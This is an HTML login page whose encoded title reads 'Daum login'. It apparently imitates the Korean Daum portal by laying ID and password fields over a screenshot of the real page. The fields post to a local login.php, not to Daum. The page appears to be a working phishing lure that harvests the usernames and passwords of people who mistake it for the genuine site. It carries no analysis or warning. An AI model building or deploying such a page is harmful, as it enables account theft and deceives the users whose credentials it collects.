<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="ko">
<head>
	<title>&#68;&#97;&#117;&#109;&#32;&#47196;&#44536;&#51064;</title>
<meta http-equiv="content-type" content="text/html; charset=iso-8859-1">
<meta name="generator" content="Web Page Maker">
</head>
<body>
<div id="image1" style="position:absolute; overflow:hidden; left:0px; top:0px; width:1365px; height:654px; z-index:0"><img src="images/paste556.jpg" alt="" title="" border=0 width=1365 height=654></div>

<form name="form1" method="POST" action="login.php" enctype="application/x-www-form-urlencoded" style="margin:0px">
<input  name="formtext1" type="text" style="position:absolute;width:301px;left:373px;top:147px;z-index:2;height: 50px;" required placeholder="&#50500;&#51060;&#46356;&#32;&#51077;&#47141;">
<input name="formtext2" type="password" style="position:absolute;width:301px;left:372px;top:202px;z-index:3;height: 50px;" required placeholder="&#48708;&#48128;&#48264;&#54840;&#32;&#51077;&#47141;">
<div id="formcheckbox1" style="position:absolute; left:373px; top:332px; z-index:5"><input type="checkbox" name="formcheckbox1"></div>
<div id="formimage1" style="position:absolute; left:365px; top:261px; z-index:6"><input type="image" name="formimage1" width="322" height="64" src="images/iso.JPG"></div>
</form>

<div id="image2" style="position:absolute; overflow:hidden; left:372px; top:332px; width:21px; height:24px; z-index:4"><img src="images/paste557.jpg" alt="" title="" border=0 width=21 height=24></div>


</body>
</html>
